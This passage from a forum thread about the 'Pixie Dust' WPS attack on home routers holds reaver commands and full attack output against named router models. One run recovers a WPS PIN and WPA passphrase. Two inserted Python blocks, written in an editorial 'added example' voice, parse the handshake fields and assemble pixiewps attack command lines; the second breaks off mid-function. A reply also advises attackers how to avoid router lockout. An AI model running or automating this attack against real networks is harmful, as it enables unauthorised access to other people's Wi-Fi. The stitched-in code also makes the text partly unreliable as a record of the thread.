    141
    Use the wireshark filter "eapol.type == 0" and they are much easier to find.

  24. #224
    Join Date
    2015-Mar
    Posts
    127
    Quote Originally Posted by aanarchyy View Post
    Use the wireshark filter "eapol.type == 0" and they are much easier to find.
    Is that a display filter, correct?
    Is there a similar capture filter so the file size is not so big?

  25. #225
    Join Date
    2015-Mar
    Posts
    127
    Googled my own question.
    Display filter for Ethernet type EAPOL:
    "eapol.type == 0" or just "eapol"

    Capture filter for Ethernet type EAPOL - only saves EAPOLs to the hard drive during a capture session, much smaller file size:
    "ether proto 0x888e"

    Enter without quotes.
    Last edited by nuroo; 2015-04-16 at 00:39.
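    Once the EAPOL frames are isolated with the filters above, the M1/M2 fields reaver prints as [P] lines are just WSC attributes: a TLV stream of 2-byte type, 2-byte length, value, all big-endian, carried inside EAP-WSC. The parser below is an added example (not code from reaver, Wireshark or any poster) that decodes such a stream into the same fields, so a capture can be checked against reaver's output; it is general, handling any attribute the stream contains, not only the ones this thread reads. The attribute IDs are those from the Wi-Fi Simple Configuration specification; the M1 payload in constructed_m1() is constructed, not from a real capture. Feed it the WPS attribute bytes Wireshark shows under the EAP payload; if a message was fragmented across several EAP frames, reassemble it first.

```python
import struct

# WSC attribute IDs from the Wi-Fi Simple Configuration spec. Only the ones this
# thread reads off M1/M2 are named; anything else is kept under a hex label.
WSC_ATTRS = {
    0x104A: "version",
    0x1022: "message_type",
    0x1047: "uuid_e",
    0x1020: "mac_address",
    0x101A: "e_nonce",
    0x1039: "r_nonce",
    0x1032: "public_key",
    0x1014: "e_hash1",
    0x1015: "e_hash2",
    0x1021: "manufacturer",
    0x1023: "model_name",
    0x1024: "model_number",
    0x1042: "serial_number",
}
TEXT_ATTRS = {"manufacturer", "model_name", "model_number", "serial_number"}
MESSAGE_TYPES = {0x04: "M1", 0x05: "M2", 0x07: "M3", 0x08: "M4"}


def parse_wsc_attributes(payload: bytes) -> dict:
    """Walk a WSC attribute stream and return {name: value}.

    A truncated header or an attribute whose length overruns the payload raises
    ValueError, so a damaged capture is reported instead of silently trusted.
    """
    attrs = {}
    offset = 0
    while offset < len(payload):
        if offset + 4 > len(payload):
            raise ValueError("truncated attribute header at offset %d" % offset)
        attr_type, length = struct.unpack_from(">HH", payload, offset)
        offset += 4
        if offset + length > len(payload):
            raise ValueError("attribute 0x%04x overruns payload" % attr_type)
        value = payload[offset:offset + length]
        offset += length
        name = WSC_ATTRS.get(attr_type, "attr_0x%04x" % attr_type)
        if name == "message_type" and len(value) == 1:
            attrs[name] = MESSAGE_TYPES.get(value[0], "0x%02x" % value[0])
        elif name in TEXT_ATTRS:
            attrs[name] = value.decode("utf-8", errors="replace")
        else:
            attrs[name] = value
    return attrs


def colon_hex(data: bytes) -> str:
    """Render bytes the way reaver prints them: 'aa:bb:cc:...'."""
    return ":".join("%02x" % b for b in data)


def reaver_style_lines(attrs: dict) -> list:
    """Format parsed fields like reaver's [P] lines, for side-by-side comparison."""
    order = [("e_nonce", "E-Nonce"), ("public_key", "PKE"),
             ("manufacturer", "WPS Manufacturer"), ("model_number", "WPS Model Number"),
             ("e_hash1", "E-Hash1"), ("e_hash2", "E-Hash2")]
    lines = []
    for key, label in order:
        if key in attrs:
            value = attrs[key]
            text = colon_hex(value) if isinstance(value, bytes) else value
            lines.append("[P] %s: %s" % (label, text))
    return lines


def _attr(attr_type: int, value: bytes) -> bytes:
    """Encode one TLV attribute (used only to build the constructed sample)."""
    return struct.pack(">HH", attr_type, len(value)) + value


def constructed_m1() -> bytes:
    """A constructed M1 attribute stream; the values are made up, not captured."""
    return b"".join([
        _attr(0x104A, b"\x10"),                       # version 1.0
        _attr(0x1022, b"\x04"),                       # message type M1
        _attr(0x1047, bytes(16)),                     # UUID-E
        _attr(0x1020, bytes.fromhex("020000000001")), # enrollee MAC (locally administered)
        _attr(0x101A, bytes([0xAA]) * 16),            # E-Nonce
        _attr(0x1032, bytes(range(192))),             # 1536-bit public key PKE
        _attr(0x1021, b"ExampleCo"),                  # manufacturer
        _attr(0x1024, b"123456"),                     # model number
    ])


if __name__ == "__main__":
    for line in reaver_style_lines(parse_wsc_attributes(constructed_m1())):
        print(line)
```

    The point of raising on a bad length rather than returning what was parsed so far is that M1 and M2 are exactly the messages whose fields get copied into other tools; a silently truncated public key or nonce would produce wrong downstream results with no indication of why.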

  26. #226
    Join Date
    2015-Apr
    Posts
    4
    Hello Everyone!

    I want first to congratulate you on the great steps you have made with this Pixie Dust exploit.

    Also, I have noticed that today, on the WPS Pixie Dust Database, the router Technicolor TD5130 is listed as Vulnerable.

    However, I have tested Pixie (1.0.5) on both of my router versions (v1 & v2), but always unsuccessfully. I also tested this through PixieScript 2.4, but I still get "WPS Pin not found".

    So I want to know who could perform this exploit, and how (with a full description if possible)?

    There is also a TD5130 v3 that I'd love to test it on and share with you all.

    Thank You!

  27. #227
    Join Date
    2015-Apr
    Posts
    39
    It would be interesting if you posted the output of reaver,

    so we can see what chipset it is and other information.

  28. #228
    Join Date
    2013-Mar
    Posts
    3

    More for the database

    Hi All

    A couple more for the database

    Technicolor TG-797N v3
    Not Vulnerable

    Code:
    XX:XX:XX:XX:XX:XX| 6|-70|1.0|No |Telstra9F72A5| Technicolor| 797n v3
    
    OUI: 00-10-18 (Broadcom)
    
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 41:59:b6:83:3c:ce:53:58:e8:55:5d:b2:2c:b2:87:e7
    [P] PKE: 1c:8d:16:a1:5f:08:c2:f0:07:67:b3:24:c9:26:73:c2:ff:b5:c0:3b:39:96:fd:38:b1:d6:de:b7:81:15:63:cb:43:af:f8:21:4f:1d:47:3b:d8:71:e8:17:f6:49:f6:00:31:1c:95:ed:df:76:77:63:48:2b:82:95:e2:b0:bc:c4:41:2c:b5:2b:95:a6:3d:65:3f:3b:11:5d:81:92:2a:9b:65:a2:61:86:39:c7:d0:e0:3d:4c:c9:84:5c:78:b7:87:57:e9:9f:b1:46:97:ca:e0:b6:d2:c7:30:97:7c:a6:36:d6:97:39:fc:93:be:b8:c6:dd:d6:cb:59:b3:b5:e5:0a:94:0b:4a:0c:a8:15:ae:8d:95:dc:f0:95:63:5d:57:2d:34:d6:1d:b9:9e:3e:77:d5:be:c1:1f:a3:3d:55:b8:2b:6d:02:60:a0:a6:44:89:78:e4:a8:a4:56:f8:ee:5b:cb:5f:97:2e:62:a3:0d:21:e3:6a:75:ef:40:d0:db:39:4f
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Number: 797n v3
    [P] WPS Model Serial Number: 1426SARZR
    [+] Received M1 message
    [P] PKR: 1d:4d:69:d6:76:ac:8d:6f:9e:d7:7a:3a:4a:0b:d7:38:91:fe:e4:76:99:dc:de:95:70:0f:76:8e:cf:f0:ae:9d:61:21:2e:9e:a2:49:a6:38:ce:84:bf:8c:24:d1:6e:67:27:9c:8c:5f:14:0b:80:f2:52:aa:81:ed:f9:b7:c4:93:4e:fb:c7:6c:fd:16:5d:81:d8:5d:73:c2:72:1f:9d:54:3d:a0:33:cc:83:61:e1:22:9c:4a:8d:61:d1:19:87:78:7c:ea:0e:83:1f:33:bc:a4:07:e2:a0:0a:ad:69:6b:e8:13:ca:6f:0d:d6:c5:6c:0f:0d:03:b2:4b:7c:77:22:30:c6:60:70:2d:9a:c6:fb:dc:fc:ac:6a:83:60:a0:78:e2:65:c1:53:e7:d3:c6:0c:14:75:98:83:ec:c4:6b:ff:ad:c3:4f:bc:87:d4:27:d5:6c:6d:77:d0:c6:9f:10:1d:46:54:94:6a:9e:8a:47:f0:2a:f9:e3:49:e0:93:a3:cf:99
    [P] AuthKey: e0:9a:70:98:e9:02:e6:35:de:9f:51:76:8a:bb:79:5d:c2:7e:86:55:bf:bb:ad:d6:c1:59:f6:72:ea:e1:eb:66
    [+] Sending M2 message
    [P] E-Hash1: d5:ae:2b:a4:98:12:42:08:3a:0e:7a:a2:20:b0:38:c2:92:cc:d2:89:e1:e5:d2:06:26:78:94:bd:7d:d2:70:8a
    [P] E-Hash2: f5:92:52:dc:5a:67:0a:d6:c7:b4:86:b6:7b:72:19:c9:42:f7:6f:47:cc:38:5b:3c:b5:25:74:1a:43:99:75:0c
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 1 s
    [Pixie-Dust]
    TP-LINK TD-W8960N Not Vulnerable

    Code:
     XX:XX:XX:XX:XX:XX|11|-51|1.0|No |TP-LINK_48FD412| TP-LINK| 12345690
    
    OUI: 00-10-18 (Broadcom)
    
    Device Name: TD-W8960N
    
    
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 5a:07:59:bb:b9:6a:14:bf:3a:ed:0b:50:5b:2d:8d:d2
    [P] PKE: 7f:1f:e6:78:73:18:20:fc:f8:a4:1c:dd:b6:6f:2f:a4:fb:19:2e:45:45:9a:3c:21:4b:ca:b3:ef:74:25:af:c2:a5:77:f0:da:a6:bc:7b:30:9a:24:36:d6:8c:e6:70:dd:fc:3f:53:2d:ba:f5:35:97:5c:04:c8:96:a7:37:f5:c7:0a:3d:40:74:c5:18:c3:a3:6a:c0:bb:92:e2:98:85:79:46:51:e5:01:0f:fc:9f:3f:70:42:9f:6c:4f:3f:8f:58:bb:2f:b8:48:e5:41:64:82:ea:49:c5:80:8b:60:71:0c:31:e8:d6:30:5a:d7:e5:f8:60:02:e0:9b:c8:e0:19:5b:23:61:ff:8f:47:5d:e2:94:9f:20:a2:5e:3d:25:6d:4f:6f:93:9b:32:c9:b4:12:4b:a9:7f:80:69:f8:48:8c:eb:a3:5d:25:94:3f:19:67:91:e1:96:aa:1e:1b:49:37:46:45:39:6a:a2:17:db:7a:1c:6b:34:94:db:64:bd:f5:18
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 123456
    [P] WPS Model Serial Number: 1234
    [+] Received M1 message
    [P] PKR: 95:2b:f1:10:06:77:c0:86:a1:ed:4e:72:1b:86:ab:a0:0f:0f:cd:53:36:31:8f:6b:7e:24:15:19:15:6e:b5:35:c3:f8:8b:0c:11:52:59:79:70:0c:20:5d:36:ca:8a:49:a7:28:19:55:71:c3:69:a5:49:b9:f5:6c:8a:6b:91:6f:79:a3:35:77:59:86:2e:8b:92:f6:d6:e2:b1:c5:72:c9:bd:96:8e:55:5c:48:c5:9c:71:68:77:1f:2e:d0:79:f1:46:c3:f6:98:5c:32:a8:01:f2:f4:71:d3:52:82:67:0c:85:58:b5:eb:f5:5d:a0:61:47:b3:91:1b:b8:1c:2f:b8:90:b3:ec:cd:9c:28:f3:1f:26:d0:5a:7e:1d:65:ca:f0:d1:1d:e2:ce:a3:9a:02:65:8d:15:85:07:30:20:dc:d3:6c:04:de:a4:23:b3:ec:72:bc:13:a6:60:cd:d0:72:98:fd:53:35:ff:6e:d5:6c:60:45:ba:75:7a:3c:ff:a0:4e
    [P] AuthKey: 96:60:ce:20:f5:dd:07:56:0c:71:21:e7:bf:6a:34:5b:97:4c:2a:80:23:bf:48:5b:d5:28:cf:51:2d:32:a6:0b
    [+] Sending M2 message
    [P] E-Hash1: d6:b8:56:b3:22:cb:8e:b1:15:c6:3c:b8:a4:21:99:4c:ff:a2:fb:88:d7:47:21:73:3f:2b:0c:fd:92:be:92:5a
    [P] E-Hash2: 96:bc:4e:e2:e1:14:a5:ea:8e:a3:65:03:66:f0:ef:d6:6f:ea:c9:9c:ee:60:07:dc:be:e0:63:c2:67:1c:8d:ea
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 1 s
    [Pixie-Dust]

    Billion 7800N Vulnerable

    XX:XX:XX:XX:XX:XX| 1|-40|1.0|No |Corona| http://www.billion.com.au| 1.0

    OUI: 00-0c-43 (RalinkTe)

    RT2880iNIC

    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 4b:65:ca:9d:f1:f3:8c:76:3a:ab:b7:42:8a:92:2f:b5
    [P] PKE: fd:a7:c9:c0:d9:4c:7e:fd:24:ea:5a:ec:64:e2:f1:d5:aa:f6:75:e8:f8:7f:70:a3:e9:97:5f:6c:a3:92:60:42:34:dc:ae:63:d1:ef:99:61:26:46:23:aa:26:95:61:4a:df:91:63:f9:77:fe:0e:a6:17:d2:2e:d1:39:27:d2:78:03:50:8f:06:7b:74:c6:08:af:11:0b:17:4e:75:db:52:b9:56:40:38:90:6a:d2:c0:69:af:d3:22:9e:45:b2:f3:fe:6f:b2:74:2b:c3:93:b3:e6:9d:74:57:5f:f0:7a:0d:ad:34:0d:47:b7:72:2b:5d:0d:b2:d1:7b:d3:6e:24:a8:dc:f8:e1:84:f8:a8:65:bf:96:5a:7c:ee:4e:3e:09:80:c4:c1:07:92:1a:06:83:bb:f2:64:e3:f9:06:39:b5:c3:23:9c:7a:4f:a3:56:3a:2c:56:83:1b:fe:c2:da:35:69:06:45:d4:5a:f1:6e:25:24:86:f2:db:3b:0a:0a:b7:21
    [P] WPS Manufacturer: http://www.billion.com.au
    [P] WPS Model Number: 1.0
    [P] WPS Model Serial Number: 12345678
    [+] Received M1 message
    [P] PKR: a7:b1:8c:7c:db:7e:28:fb:8a:27:9f:e9:ff:93:12:9d:ae:6b:89:ea:65:54:c2:2b:a2:0a:7b:d7:ee:57:ec:76:71:f5:5f:32:a4:94:ce:53:82:0c:9e:95:e7:e7:69:18:da:0d:f0:f2:ec:ba:b3:bd:21:bc:d3:98:ac:86:e8:1a:b3:09:e7:db:23:e3:ed:e2:d6:e7:ec:aa:da:53:45:60:78:98:78:7d:0d:09:5b:58:32:1b:8a:3a:96:b9:52:b0:0c:e3:ec:ee:db:92:cf:bf:0f:87:d5:84:ce:3a:73:28:a4:90:99:f5:3c:67:c6:1e:9c:06:35:fa:07:ed:15:f5:a1:fe:29:b3:ab:ed:50:86:74:30:11:97:a6:17:e7:5e:f7:72:1f:4f:bf:30:20:43:0f:bc:88:53:1a:fc:e0:db:96:3a:f6:66:1d:d1:31:c7:4a:44:a1:f1:d5:05:a0:80:c7:22:bd:29:e0:ed:b8:dd:80:be:70:ea:ff:a4:3c:47
    [P] AuthKey: 4c:23:09:ed:5f:b8:15:15:1e:61:b6:99:46:53:d7:2b:9c:85:13:28:80:55:b7:b5:e5:6e:bd:cc:35:99:c5:85
    [+] Sending M2 message
    [P] E-Hash1: e6:87:2c:1f:b0:60:de:3f:65:8a:4b:02:30:36:1e:da:b3:0e:58:ee:54:db:bc:d0:72:61:55:de:39:5f:a9:bb
    [P] E-Hash2: e8:c0:54:54:fa:f8:e1:ef:ad:ed:5b:90:81:60:af:6f:53:c5:74:2d:ba:aa:6c:28:28:e6:a5:fa:8c:78:fe:ec
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: 91:5a:dd:fd:ef:ce:21:83:97:a9:13:ef:ed:94:5a:cf
    [Pixie-Dust][*] PSK2: 91:e6:ab:f1:08:66:bf:56:3e:df:3a:df:67:5a:de:90
    [Pixie-Dust] [+] WPS pin: 48606684
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running reaver with the correct pin, wait ...
    Cmd : reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 1 -s y -p 48606684

    [Reaver Test] BSSID: XX:XX:XX:XX:XX:XX
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '48606684'
    [Reaver Test] [+] WPA PSK: 'Routersecurityflawed'
    [Reaver Test] [+] AP SSID: 'Corona'


    Excellent work on the mods to reaver and the pixie wps

    Cheers
    Extra

  29. #229
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by unsuns06 View Post
    Hello Everyone!

    I want first to congratulate you on the great steps you have made with this Pixie Dust exploit.

    Also, I have noticed that today, on the WPS Pixie Dust Database, the router Technicolor TD5130 is listed as Vulnerable.

    However, I have tested Pixie (1.0.5) on both of my router versions (v1 & v2), but always unsuccessfully. I also tested this through PixieScript 2.4, but I still get "WPS Pin not found".

    So I want to know who could perform this exploit, and how (with a full description if possible)?

    There is also a TD5130 v3 that I'd love to test it on and share with you all.

    Thank You!
    The Realtek implementation is unfinished as of right now, 4/17/15. It ONLY works if the whole entire WPS exchange occurs within 1 second (here, E-S1 = E-S2 = E-Nonce). Wiire is currently working on the PRNG brute force and it shouldn't be too long that it is finished. In the meantime, I suggest you wait and don't try to attack it again so you don't get locked out. If you want, you can send me all the keys/info and I'll look into it more
    Last edited by soxrok2212; 2015-04-18 at 01:12.

  30. #230
    Join Date
    2013-Oct
    Posts
    321
    Very very very nice work guys, guess there's no stopping progress. :-)

    Would anyone mind if I added the pixie dust attack into FrankenScript?

  31. #231
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Quote Originally Posted by slim76 View Post
    ... guess theres no stopping progress...
    hey that's my line!!!

    Quote Originally Posted by slim76 View Post
    Would anyone mind if I added the pixie dust attack into FrankenScript?
    I don't

  32. #232
    Join Date
    2015-Apr
    Posts
    2
    Quote Originally Posted by t6_x View Post
    It would be interesting if you put the output of reaver.

    So we can see what chipset is and other information

    I hope the following output of the tests of 3 routers is useful:

    root@kali64:~# reaver -i mon0 -b 5C9:98:33:xx:xx -vv -K 1

    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead

    Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
    [+] Waiting for beacon from 5C9:98:33:xx:xx
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Associated with 5C9:98:33:xx:xx (ESSID: xxxxxxxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: fc:09:f4:f8:14:f7:d8:6a:e0:1f:45:af:39:c7:0f:ad
    [P] PKE: 85:84:7e:84:11:31:2e:77:e4:1b:da:ca:e5:be:c5:7f:1f:66:b5:e8:5f:21:f9:54:87:4f:49:ab:f4:bf:2d:93:e8:1f:f3:92:de:d5:96:0f:98:25:e5:dd:74:d5:5a:ad:85:cc:5a:f1:9d:c3:17:02:26:89:30:50:b4:e3:43:52:51:56:27:7a:22:c2:a2:6d:ba:4c:c5:01:2d:ca:0c:21:ac:4c:94:12:27:aa:d1:3d:7c:49:bc:26:46:ac:c6:d6:e4:34:50:7c:91:fd:25:fd:30:07:09:8d:88:5f:46:b8:ed:1e:99:70:42:1b:29:31:7c:75:9c:56:4a:75:ee:3e:2d:0e:b1:45:e0:1a:c7:e5:b4:e7:f8:88:bf:ae:87:2e:49:10:92:06:17:94:49:c0:5d:4c:17:87:79:4c:c8:de:01:b0:0b:24:fb:2d:bd:4c:cb:80:99:7d:b4:d4:fa:af:38:8d:92:b2:77:ac:0d:69:9d:58:dc:a9:31:08:98:da
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: 9a:86:3f:ff:71:8d:9d:e6:53:e3:a9:d7:e0:f8:95:cf:74:0e:7e:88:32:67:c9:d1:87:2a:6b:e3:5a:17:88:4e
    [+] Sending M2 message
    [P] E-Hash1: 31:a7:13:e2:68:e4:4a:6f:af:c7:04:08:6e:5d:93:62:21:b9:8e:a3:c3:31:47:d2:44:11:49:43:ef:ae:ac:c8
    [P] E-Hash2: 3c:60:ee:50:64:40:4a:16:52:73:3f:2c:34:9b:6c:7e:47:71:9a:bc:71:b6:96:a1:3c:9b:c9:bc:14:ce:6d:76
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]


    root@kali64:~# reaver -i mon0 -b 40:16:7E:5D:xx:xx -vv -K 1

    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead

    Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
    [+] Waiting for beacon from 40:16:7E:5D:xx:xx
    [+] Switching mon0 to channel 1
    [+] Associated with 40:16:7E:5D:xx:xx (ESSID: xxxxxxxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: c3:b1:c2:3b:2a:5f:f3:35:83:c4:d2:68:16:64:d9:76
    [P] PKE: ae:90:dd:03:c2:b4:b0:7f:17:5d:c9:cf:3a:d8:6b:ca:1f:24:08:20:55:a8:73:65:6f:61:b7:a3:a8:2c:00:58:fb:d0:3d:bc:35:a6:f6:10:fc:d2:c1:70:1c:9d:5f:af:d6:ed:3f:ab:38:ff:86:9d:f7:84:6f:22:3b:cf:1e:9f:bf:cc:a1:74:07:a1:69:7c:71:75:4e:cf:10:d6:34:d8:3a:b4:07:58:50:95:70:73:53:0e:c3:0f:de:34:7d:51:05:ad:74:82:08:c6:04:ef:f9:42:a8:29:19:0c:68:64:63:ee:77:d8:50:b6:fb:9e:7d:87:84:86:fe:78:6e:54:15:b6:32:3c:60:92:1c:aa:ce:49:a7:13:09:2b:ee:a8:4c:31:d3:09:b6:11:c4:16:32:c5:b9:9e:0d:65:89:96:f1:7f:37:2f:42:75:d2:cf:50:b6:67:70:a7:1a:28:a8:d1:e8:4a:ec:a9:26:9f:b7:c8:ea:78:9f:ad:e3:06:a8
    [P] WPS Manufacturer: ASUSTeK Computer Inc.
    [P] WPS Model Number: RT-N12
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: 8d:9c:e2:47:23:ac:b2:d1:f6:de:cd:d5:c1:d3:3f:41:13:a4:e7:5c:20:3b:24:7c:f2:1a:4b:19:6f:ca:68:3b
    [+] Sending M2 message
    [P] E-Hash1: 6b:0f:9b:cd:c8:0e:92:78:13:6f:b8:01:f1:45:0c:3d:99:88:60:1d:5d:69:6e:e6:55:da:44:a1:d9:61:1f:52
    [P] E-Hash2: 0c:16:eb:80:24:18:f5:1a:7d:c3:11:ba:c4:1c:e6:d6:56:81:31:c3:76:6a:52:1c:4a:c6:5e:ad:0c:51:19:7b
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]



    root@kali64:~# reaver -i mon0 -b 64:70:02:5C:xx:xx -vv -K 1

    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead

    Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
    [?] Restore previous session for 64:70:02:5C:xx:xx? [n/Y] n

    [+] Associated with 64:70:02:5C:xx:xx (ESSID: xxxxxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: bf:1e:7d:b5:18:9e:f0:66:22:9c:5e:20:2e:43:31:6c
    [P] PKE: 9d:48:eb:a8:25:6e:6b:7d:aa:f5:b9:f2:da:49:66:b9:cd:8f:b1:ab:25:16:ba:7b:df:87:71:7e:d1:e8:af:b1:71:ba:c4:96:89:d8:db:1b:57:2c:61:cc:0e:a4:c6:31:02:38:43:50:d1:be:b1:83:49:19:3e:8c:ed:9f:55:e5:6e:a7:1a:05:c5:5f:22:e0:c4:ac:d5:5d:d6:bd:32:a8:1d:e2:6f:25:78:e6:9a:4d:55:f1:7b:dd:ba:ed:13:7f:33:a6:76:38:af:c2:b5:d6:10:42:eb:98:4e:f6:fe:90:dd:4d:79:d6:08:d7:3a:0c:86:11:4d:b5:75:76:d7:4c:48:a3:00:33:97:2c:b5:57:a3:83:1a:5c:58:94:78:53:cf:58:54:c2:1f:fa:ec:91:06:84:d9:95:2a:38:31:72:a2:cc:17:63:a0:13:a0:9e:7d:cf:cd:14:dd:07:82:76:2c:76:7d:2d:e2:fd:4a:d9:a2:f4:b0:b1:fc:80:18:b1
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: 08:a0:73:06:7c:1c:bf:77:d9:04:a5:14:90:8f:b6:5d:4b:d7:f5:06:7a:8d:f4:e0:25:88:ae:70:07:d8:f4:82
    [+] Sending M2 message
    [P] E-Hash1: 2d:55:4e:4a:17:6a:87:ac:33:ae:e4:be:f8:3c:94:f0:d9:ee:fd:5c:a6:a8:af:96:20:8a:07:e7:5d:cd:cd:35
    [P] E-Hash2: 11:f1:24:8c:37:54:fd:3c:5b:f3:b5:66:df:6a:58:e9:9c:f4:2c:9d:d5:ab:4e:36:89:bc:d8:27:9c:ac:15:7d
    [Pixie-Dust]
    [Pixie-Dust] [-] WPS pin not found!
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
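
The three transcripts above are the raw material that has to be fed to pixiewps by hand: the `[P]` lines for PKE, PKR, AuthKey, E-Hash1, E-Hash2 and E-Nonce. The following parser is an added example, not code from reaver, the t6_x fork or pixiewps, that pulls those lines out of a reaver `-vv` run, strips the spaces that forum or terminal wrapping inserts into the hex (visible in the outputs above), checks that every value has the length WPS gives it, and builds the pixiewps argument vector. The flag letters (`-e -r -s -z -a -n -S`) are the pixiewps 1.x short options as this editor knows them, and PKR equal to the small DH public key 2 (the `...:00:02` value reaver prints when run with `-S`) is translated into `-S` rather than passed as `-r`. The sample transcript embedded at the bottom is constructed, not captured from any AP.

```python
"""
Turn the [P] lines of a reaver -vv run into a pixiewps command line.
Added example, not part of reaver or pixiewps.
"""
import re
import shlex

# reaver field name -> (pixiewps short flag, length WPS requires, in bytes)
FIELDS = {
    "PKE": ("-e", 192),
    "PKR": ("-r", 192),
    "AuthKey": ("-a", 32),
    "E-Hash1": ("-s", 32),
    "E-Hash2": ("-z", 32),
    "E-Nonce": ("-n", 16),
}
SMALL_DH_PKR = bytes(191) + b"\x02"   # public key for private key 1 (reaver -S)
LINE_RE = re.compile(r"^\s*\[P\]\s+(?P<name>[A-Za-z0-9-]+):\s*(?P<hex>[0-9a-fA-F: ]+?)\s*$")


def colon_hex(data: bytes) -> str:
    return ":".join(f"{b:02x}" for b in data)


def parse_reaver_output(text: str) -> dict:
    """Extract the Pixie Dust inputs; raises ValueError on a truncated value."""
    fields = {}
    for line in text.splitlines():
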